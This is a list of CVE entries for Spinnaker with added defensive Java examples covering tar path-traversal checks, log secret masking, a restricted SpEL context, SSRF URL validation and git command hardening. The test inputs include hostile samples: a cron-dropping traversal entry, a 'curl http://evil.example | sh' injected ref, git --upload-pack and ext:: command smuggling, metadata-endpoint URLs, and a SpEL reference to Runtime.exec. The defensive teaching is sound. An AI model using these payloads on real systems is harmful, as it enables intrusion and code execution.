8 matches found
CVE-2020-9301
CVE-2020-9301 affects Spinnaker before v1.23.4, v1.22.4, and v1.21.5. The issue involves handling of SpEL expressions allowing an authenticated attacker to read and write arbitrary files inside the orca container via HTTP POST requests. Affected component: Spinnaker container/orca handling of SpE...
CVE-2021-39143
Spinnaker path traversal (CVE-2021-39143) arises from TAR extraction in AppEngine deployments, where archive entries are written to disk without validating their paths, so a crafted archive can overwrite files outside the extraction directory on the container and potentially enable MITM via library wrapper/file injection. Affected component: io.spinnaker.clouddr...
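The check that the extraction code above lacks, as an added example rather than Spinnaker's own code: each entry name is resolved under the destination directory and normalised, and anything that ends up outside that directory (a "../" prefix or an absolute name) is refused before a byte is written. The archive is constructed in memory so the program runs offline; Apache Commons Compress is an assumed dependency for reading and writing tar, not a claim about what Spinnaker uses.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import org.apache.commons.compress.archivers.tar.TarArchiveEntry;
import org.apache.commons.compress.archivers.tar.TarArchiveInputStream;
import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream;

// Added example (not Spinnaker code): tar extraction that rejects entries whose
// normalised path leaves the destination directory. Assumes commons-compress.
public class SafeTarExtract {

    /** Resolves an entry name under destDir and rejects anything that escapes it. */
    static Path safeResolve(Path destDir, String entryName) throws IOException {
        Path base = destDir.toAbsolutePath().normalize();
        // resolve() with an absolute entry name yields that absolute path, which then
        // fails startsWith(); "../" segments are collapsed by normalize() first.
        Path target = base.resolve(entryName).normalize();
        if (!target.startsWith(base)) {
            throw new IOException("tar entry escapes destination: " + entryName);
        }
        return target;
    }

    /** Extracts regular files and directories only; returns the paths written. */
    static List<Path> extract(InputStream tar, Path destDir) throws IOException {
        List<Path> written = new ArrayList<>();
        try (TarArchiveInputStream in = new TarArchiveInputStream(tar)) {
            TarArchiveEntry entry;
            while ((entry = in.getNextTarEntry()) != null) {
                Path target = safeResolve(destDir, entry.getName());
                if (entry.isSymbolicLink() || entry.isLink()) {
                    // A link with a clean name can still point outside destDir.
                    throw new IOException("links not permitted in deployment archive: " + entry.getName());
                }
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    Files.copy(in, target);
                }
                written.add(target);
            }
        }
        return written;
    }

    /** Constructed archive: one legitimate file and one traversal entry. */
    static byte[] buildArchive() throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (TarArchiveOutputStream out = new TarArchiveOutputStream(bos)) {
            addFile(out, "app/index.html", "<h1>hello</h1>");
            addFile(out, "../../etc/cron.d/evil", "* * * * * root /tmp/payload");
        }
        return bos.toByteArray();
    }

    private static void addFile(TarArchiveOutputStream out, String name, String body) throws IOException {
        byte[] data = body.getBytes(StandardCharsets.UTF_8);
        TarArchiveEntry e = new TarArchiveEntry(name);
        e.setSize(data.length);
        out.putArchiveEntry(e);
        out.write(data);
        out.closeArchiveEntry();
    }

    public static void main(String[] args) throws IOException {
        Path dest = Files.createTempDirectory("deploy");
        try {
            extract(new ByteArrayInputStream(buildArchive()), dest);
        } catch (IOException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The first entry is written and the second is refused. Refusing links is the conservative choice for a deployment artifact; an extractor that must support them has to resolve the link target against the destination with the same startsWith check and still cannot rule out a later entry being written through an earlier link.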
CVE-2022-23506
CVE-2022-23506 affects Spinnaker’s Rosco microservice. Prior to versions 1.29.2, 1.28.4, and 1.27.3, Rosco did not properly mask secrets generated during Packer builds, which could expose AWS credentials in log files. The issue is fixed in 1.29.2, 1.28.4, and 1.27.3. A workaround recom...
CVE-2023-39348
CVE-2023-39348 affects Spinnaker and is caused by log output for GitHub status notifications being set to FULL, potentially exposing GitHub tokens in logs. The issue is limited to users of GitHub Status Notifications and could enable token exposure with elevated access to repositories outside of ...
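Both of the log-exposure entries above (Rosco failing to mask Packer output, and FULL HTTP logging of GitHub status notifications) come down to credential-shaped strings reaching a log sink. The following is an added example, not Spinnaker's code, of a masking pass run over each line before it is logged. The patterns cover only the shapes named here (AWS access key IDs, AWS secrets identified by the variable name that carries them, GitHub token prefixes, and Authorization headers as dumped by a verbose HTTP client); the sample lines are constructed.

```java
import java.util.List;
import java.util.regex.Pattern;

// Added example (not Spinnaker code): masking cloud and SCM credentials before a line
// reaches the log sink. The patterns are illustrative, not exhaustive.
public class SecretMasker {

    static final String MASK = "****";

    // AWS access key IDs have a fixed shape; match the token as a whole word.
    static final Pattern AWS_ACCESS_KEY_ID =
        Pattern.compile("(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])");

    // AWS secret keys have no reliable shape, so match the value by the name that
    // carries it (env var, Packer/HCL or JSON style, case-insensitive).
    static final Pattern AWS_SECRET_BY_NAME =
        Pattern.compile("(?i)(aws_secret_access_key|aws_session_token)(\\s*[=:]\\s*\"?)([^\\s\",]+)");

    // GitHub token prefixes (classic PAT, OAuth, user-to-server, app and refresh
    // tokens, fine-grained PAT).
    static final Pattern GITHUB_TOKEN =
        Pattern.compile("\\b(?:ghp|gho|ghu|ghs|ghr|github_pat)_[A-Za-z0-9_]{20,}");

    // Authorization header values in dumped HTTP traffic (what a FULL log level emits).
    static final Pattern AUTH_HEADER =
        Pattern.compile("(?i)(Authorization:\\s*(?:Bearer|token|Basic)\\s+)\\S+");

    static String mask(String line) {
        String out = AWS_ACCESS_KEY_ID.matcher(line).replaceAll(MASK);
        out = AWS_SECRET_BY_NAME.matcher(out).replaceAll("$1$2" + MASK);
        out = GITHUB_TOKEN.matcher(out).replaceAll(MASK);
        out = AUTH_HEADER.matcher(out).replaceAll("$1" + MASK);
        return out;
    }

    // Constructed log lines in the shape of a Packer build log and an HTTP client dump.
    static final List<String> SAMPLE = List.of(
        "amazon-ebs: env AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
        "amazon-ebs: env AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
        "---> HTTP POST https://api.github.com/repos/org/repo/statuses/abc123",
        "Authorization: token ghp_0123456789abcdefghijklmnopqrstuvwxyzAB",
        "deploy finished for stack prod in us-west-2");

    public static void main(String[] args) {
        for (String line : SAMPLE) System.out.println(mask(line));
    }
}
```

Pattern masking is a backstop: it catches what it knows the shape of and nothing else. The primary fixes are the ones the entries describe, not emitting the values in the first place and not running the HTTP client at a log level that dumps headers and bodies.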
CVE-2021-43832
CVE-2021-43832 applies to Spinnaker, where improper permissions allow an arbitrary user with gate-endpoint access to create and execute pipelines without authentication. If RBAC is not configured across all accounts/applications, this enables remote execution and deploying resources on any accoun...
CVE-2026-32613
Spinnaker is affected by a security issue in its use of Spring Expression Language (SpEL) where, in versions prior to 2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2, the SpEL evaluation context was not restricted to trusted classes, allowing FULL JVM access. This enables a user to invoke arbitrary Java classes,...
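The two SpEL entries above (CVE-2020-9301 and CVE-2026-32613) are both consequences of evaluating user-supplied expressions against an unrestricted context. The following is an added example, not Spinnaker's code, showing the difference in Spring's own API: `StandardEvaluationContext` resolves any class through `T(...)` and permits constructors and reflective method calls, while `SimpleEvaluationContext` ships without a type locator, constructor resolvers or bean resolver, so the same expression fails at evaluation time. The parameter map and expressions are constructed; spring-expression is the only dependency.

```java
import java.util.Map;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

// Added example (not Spinnaker code): unrestricted versus restricted SpEL contexts.
public class SpelContextDemo {

    // Constructed stand-in for pipeline parameters that expressions legitimately reference.
    static final Map<String, Object> PARAMS = Map.of("region", "us-west-2", "stack", "prod");

    // Legitimate use: build a name from two parameters.
    static final String HARMLESS = "['region'] + '-' + ['stack']";

    // Type reference: with full JVM access this reads a system property; the same
    // mechanism reaches T(java.lang.Runtime).getRuntime().exec(...) or java.io.File,
    // which is how expression evaluation becomes file access or command execution.
    static final String TYPE_REF = "T(java.lang.System).getProperty('java.version')";

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Unsafe: StandardEvaluationContext resolves any class via T(...), allows
    // constructors (new ...) and calls methods through reflection.
    static Object evaluateUnrestricted(String expr) {
        StandardEvaluationContext ctx = new StandardEvaluationContext(PARAMS);
        return PARSER.parseExpression(expr).getValue(ctx);
    }

    // Hardened: SimpleEvaluationContext has no TypeLocator, no constructor resolvers
    // and no bean resolver, so T(...) and new ... throw SpelEvaluationException.
    static Object evaluateRestricted(String expr) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        return PARSER.parseExpression(expr).getValue(ctx, PARAMS);
    }

    public static void main(String[] args) {
        System.out.println("restricted, harmless:   " + evaluateRestricted(HARMLESS));
        System.out.println("unrestricted, type ref: " + evaluateUnrestricted(TYPE_REF));
        try {
            evaluateRestricted(TYPE_REF);
            System.out.println("restricted, type ref:   NOT blocked");
        } catch (SpelEvaluationException e) {
            System.out.println("restricted, type ref:   blocked (" + e.getMessageCode() + ")");
        }
    }
}
```

The data-binding context still allows method calls on the objects it is handed, so what those objects expose is part of the attack surface; the context limits which classes can be reached, not what a reachable object can do.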
CVE-2025-61916
Spinnaker (multi-cloud CD platform) is affected by an SSRF vulnerability in versions before 2025.1.6, 2025.2.3, and 2025.3.0. The issue arises from server-side requests that can be triggered by user-supplied URLs through certain artifacts (e.g., GitHub, Bitbucket, GitLab, HTTP) and can be consume...
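The SSRF entry above is the general case of a server fetching whatever URL a user names in an artifact. The following is an added example, not Spinnaker's code, of the two checks a fetcher needs before connecting: a scheme and host allowlist that needs no network access, and an address check applied to every resolved address so that a hostname pointing at loopback, link-local (including the cloud metadata endpoint), RFC 1918 or unique-local space is refused. The allowlisted hosts and the choice to permit only https are assumptions for the example; the input URLs are constructed.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.util.Set;

// Added example (not Spinnaker code): validating a user-supplied artifact URL before
// the server fetches it. The allowlist and https-only rule are assumptions.
public class ArtifactUrlGuard {

    // Assumed allowlist of artifact providers this service may call.
    static final Set<String> ALLOWED_HOSTS = Set.of(
        "github.com", "api.github.com", "raw.githubusercontent.com",
        "gitlab.com", "api.bitbucket.org");

    /** Scheme and host checks that need no network access. */
    static boolean isAllowedUrl(String raw, Set<String> allowedHosts) {
        URI uri;
        try {
            uri = new URI(raw);
        } catch (URISyntaxException e) {
            return false;
        }
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (scheme == null || host == null) return false;      // file:, opaque or authority-less URIs
        if (!scheme.equalsIgnoreCase("https")) return false;  // no plain http, no other schemes
        if (uri.getRawUserInfo() != null) return false;       // "https://github.com@10.0.0.5/" style
        return allowedHosts.contains(host.toLowerCase());
    }

    /** Address check to run on every resolved address before connecting, and again on redirects. */
    static boolean isPublicAddress(InetAddress addr) {
        if (addr.isAnyLocalAddress() || addr.isLoopbackAddress() || addr.isLinkLocalAddress()
                || addr.isSiteLocalAddress() || addr.isMulticastAddress()) {
            return false;
        }
        byte[] b = addr.getAddress();
        if (b.length == 4) {
            int first = b[0] & 0xff, second = b[1] & 0xff;
            if (first == 0) return false;                                          // 0.0.0.0/8
            if (first == 100 && second >= 64 && second <= 127) return false;       // 100.64.0.0/10
        } else if (b.length == 16) {
            if ((b[0] & 0xfe) == 0xfc) return false;                               // fc00::/7 unique local
        }
        return true;
    }

    /** Combined check; resolves the host, so it needs DNS and must be repeated per connection. */
    static boolean isSafeTarget(String raw, Set<String> allowedHosts) throws UnknownHostException {
        if (!isAllowedUrl(raw, allowedHosts)) return false;
        String host = URI.create(raw).getHost();
        for (InetAddress a : InetAddress.getAllByName(host)) {
            if (!isPublicAddress(a)) return false;
        }
        return true;
    }

    public static void main(String[] args) throws UnknownHostException {
        String[] inputs = {
            "https://raw.githubusercontent.com/org/repo/main/manifest.yaml",
            "http://169.254.169.254/latest/meta-data/",
            "https://github.com@169.254.169.254/",
            "file:///etc/passwd",
            "https://internal-vault.corp.example:8200/v1/secret"
        };
        for (String in : inputs) System.out.println(isAllowedUrl(in, ALLOWED_HOSTS) + "  " + in);
        // Literal addresses resolve without DNS, so these run offline.
        for (String ip : new String[] {"10.0.0.5", "169.254.169.254", "127.0.0.1", "140.82.112.3"}) {
            System.out.println(isPublicAddress(InetAddress.getByName(ip)) + "  " + ip);
        }
    }
}
```

Two caveats the code cannot close on its own: the HTTP client must not follow redirects automatically, or must re-run the checks on each hop, and the address actually connected to must be the one that was checked (resolve once and connect to that address, or run the check inside the client's DNS hook), otherwise a rebinding name passes validation and resolves elsewhere a moment later.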
CVE-2026-32604
CVE-2026-32604 affects Spinnaker before the patched releases 2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2. The vulnerability arises in clouddriver components when handling gitrepo artifacts, allowing a bad actor to execute arbitrary commands on the pod (RCE) by exploiting improper input handling on...
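The gitrepo entry above is truncated before it says which field was mishandled, so the following makes no claim about that; it is an added example, not Spinnaker's code, of the hardening that applies whenever a user-controlled repository URL and ref are handed to a git child process: no shell in the path, a restrictive ref grammar, an https-only remote, and a `--` separator so positional arguments cannot be read as options. The inputs are constructed.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.util.List;
import java.util.regex.Pattern;

// Added example (not Spinnaker code): spawning git with user-controlled URL and ref
// without a shell and without letting either value be parsed as an option.
public class GitCloneGuard {

    // Conservative ref grammar: a subset of what `git check-ref-format` accepts.
    static final Pattern SAFE_REF = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._/-]{0,254}");

    static void validateRef(String ref) {
        if (!SAFE_REF.matcher(ref).matches() || ref.contains("..") || ref.endsWith("/")
                || ref.endsWith(".lock") || ref.contains("@{")) {
            throw new IllegalArgumentException("refused git ref: " + ref);
        }
    }

    static void validateRepoUrl(String url) {
        // https only: this also rejects "ext::" transports, local paths and ssh remotes
        // whose host part could smuggle ssh options.
        if (!url.startsWith("https://") || url.indexOf('\'') >= 0 || url.indexOf('\n') >= 0) {
            throw new IllegalArgumentException("refused repository URL: " + url);
        }
    }

    /** Builds the argument vector; nothing here is interpreted by a shell. */
    static List<String> cloneCommand(String repoUrl, String ref, Path dest) {
        validateRepoUrl(repoUrl);
        validateRef(ref);
        // "--" ends option parsing, so the URL and directory can never be read as an
        // option such as --upload-pack=<command>. The ref is consumed as the value of
        // --branch regardless, so it is protected by validateRef, not by "--".
        return List.of("git", "clone", "--depth", "1", "--branch", ref, "--",
                repoUrl, dest.toString());
    }

    static Process run(List<String> argv, Path workDir) throws IOException {
        ProcessBuilder pb = new ProcessBuilder(argv).directory(workDir.toFile());
        // Do not leak the service's own git/ssh configuration into the child.
        pb.environment().keySet().removeIf(k -> k.startsWith("GIT_") || k.startsWith("SSH_"));
        pb.environment().put("GIT_TERMINAL_PROMPT", "0");
        return pb.redirectErrorStream(true).start();
    }

    public static void main(String[] args) {
        Path dest = Path.of("/tmp/work/repo");
        System.out.println(cloneCommand("https://github.com/org/repo.git", "release/1.2", dest));
        // Constructed hostile inputs; each is refused before any process is started.
        String[][] bad = {
            {"https://github.com/org/repo.git", "--upload-pack=touch /tmp/pwned"},
            {"https://github.com/org/repo.git", "main; curl http://evil.example | sh"},
            {"ext::sh -c 'touch /tmp/pwned' %", "main"},
        };
        for (String[] b : bad) {
            try {
                cloneCommand(b[0], b[1], dest);
            } catch (IllegalArgumentException e) {
                System.out.println(e.getMessage());
            }
        }
    }
}
```

Building the command as a `List<String>` for `ProcessBuilder` is what removes shell metacharacters from consideration; the validators exist for the other way user input becomes code, which is git itself interpreting an argument as an option or a transport.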